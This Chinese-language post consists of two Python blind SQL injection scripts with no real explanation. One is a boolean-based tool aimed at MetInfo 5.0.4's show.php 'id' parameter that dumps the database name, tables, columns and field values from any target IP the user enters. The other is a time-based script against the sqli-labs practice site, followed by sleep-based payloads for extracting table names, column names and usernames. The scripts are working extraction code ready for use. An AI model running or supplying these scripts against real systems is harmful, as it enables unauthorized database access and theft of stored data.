-
布尔盲注脚本
import string
import requests
import binascii
############################################################################################################
# 定义字符集 #
############################################################################################################
try:
# 定义字符集
strings = string.digits+string.ascii_letters+'_'
str = []
for i in strings:
str.append(i)
ip=input("输入目标 ip:")
############################################################################################################
# 爆破数据库长度 #
############################################################################################################
database_length=0
for i in range(1,30):
url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and length(database())={i}"
res = requests.get(url=url)
if res.status_code == 200:
database_length=i
break
print(f"数据库名长度为{i}位")
database_length=i
print("***************************************************************************************************")
############################################################################################################
# 爆破数据库名 #
############################################################################################################
database_name=""
print("当前数据库:")
for i in range(1,database_length+1):
# 每位遍历字母数字下划线
for j in str:
# 进行 ascii 转码
url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr(database(),{i},1))={ord(j)}"
res = requests.get(url=url)
if res.status_code == 200:
print(j,end="")
break
print()
print("***************************************************************************************************")
#############################################################################################################
# 爆破表名 #
############################################################################################################
print("爆破表名")
for i in range(0,600):
# flag 用于避免爆破完每张表的继续进行多余爆破
flag=0
# end 用于避免爆破完表继续进行多余爆破
end=0
print(f"[{i+1}]", end="")
# 假设每个表的表名最长30位,每个表名按位查询
for j in range(1,30):
for name_str in str:
url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1))={ord(name_str)}"
res = requests.get(url=url)
if res.status_code == 200:
print(name_str,end="")
# 该表名非空(未达到最大表数量)
end=1
break
elif name_str=='_':
flag=1
break
# 跳出超过表长,跳出循环
if flag==1:
break
# 爆破的数据表超过最大数量,跳出循环
if end==0:
break
print()
#############################################################################################################
# 爆破字段名 #
############################################################################################################
print("***************************************************************************************************")
table_name=input("输入要爆破的表名:")
table=table_name
table_name="0x"+binascii.hexlify(table_name.encode()).decode()
# 跑第0-100个字段
for i in range(0,100):
print([i+1],end="")
end=0
# 假设每个表的字段名最长30位,每个字段名按位查询
for j in range(1,30):
flag = 0
for name_str in str:
url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name={table_name} limit {i},1),{j},1))={ord(name_str)}"
res = requests.get(url=url)
if res.status_code == 200:
end=1
flag=1
print(name_str,end="")
break
# 超过该字段长度,跳出循环,开始爆破下个字段
if flag==0:
break
print()
if end==0:
break
#############################################################################################################
# 爆破字段数据 #
############################################################################################################
print("***************************************************************************************************")
column=input("输入要爆破的字段:")
# 跑第0-100个用户名
for i in range(0,100):
end=0
# 假设每个用户的表名最长100位,每个用户名按位查询
for j in range(1,100):
flag=0
for name_str in str:
url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select {column} from {table} limit {i},1),{j},1))={ord(name_str)}"
res = requests.get(url=url)
if res.status_code == 200:
end=1
flag=1
print(name_str,end="")
break
if flag==0:
break
print()
if end==0:
break
except:
pass
-
延时注入脚本
import requests #最关键的requests库,可以好好了解一下
import time #这个也是必要的
chars=',abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'#爆破
database='' #把结果加到这个变量里
global length
for l in range(1,20): #这里有时候range 要大些,因为用了group_concat把结果都放在一行了,可能使长度很大
url ='http://10.4.7.176/sqli-labs/Less-1/' #url自己根据情况改
close="?id=1'" #闭合方式
payload1=' and if(length(database())=%s,sleep(2),0) --+' %l #最关键的地方,和其他注入方法的payload 差不多,只是用了延时的手法
start_time=time.time()
r=requests.get(url+close+payload1)
end_time=time.time()
sec=end_time-start_time #算出get请求和sleep后所用的时间
if sec >=2: #时间符号条件就print并退出
print('database length is '+str(l))
global length
length =l;
break
else:
pass
for i in range (1,length+1):
for char in chars:
payload2="and if(substr(database(),%d,1)='%s',sleep(2),1) --+" %(i,char) #substr取每位爆破
start_time2=time.time()
r2=requests.get(url+close+payload2)
end_time2=time.time()
sec2=(end_time2-start_time2) #也是一样,符合条件就输出
if sec2 >=2:
database+=char
print(database)
break
print('database_name:',database)
爆破表长的payload:
payload="and if(length((select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1))=%s,sleep(3),1) --+" %l
爆破表名的payload:
payload = " and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)
//爆破名字的时候建议套上ascii()函数,这样不容易出错pwp
列
爆破列长的payload:
payload=" and if(length((select group_concat(column_name) from information_schema.columns where table_name = 'users' ))=%s,sleep(3),1) --+" %l
爆破列名的payload:
payload2 = " and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'users' limit 0,1),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)
字段
爆破字段长的payload:
payload=" and if(length((select group_concat(username) from users ))=%s,sleep(3),1) --+" %l
爆破字段名的payload:
payload=" and if(ascii(substr((SeLeCt group_concat(username) from users ),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)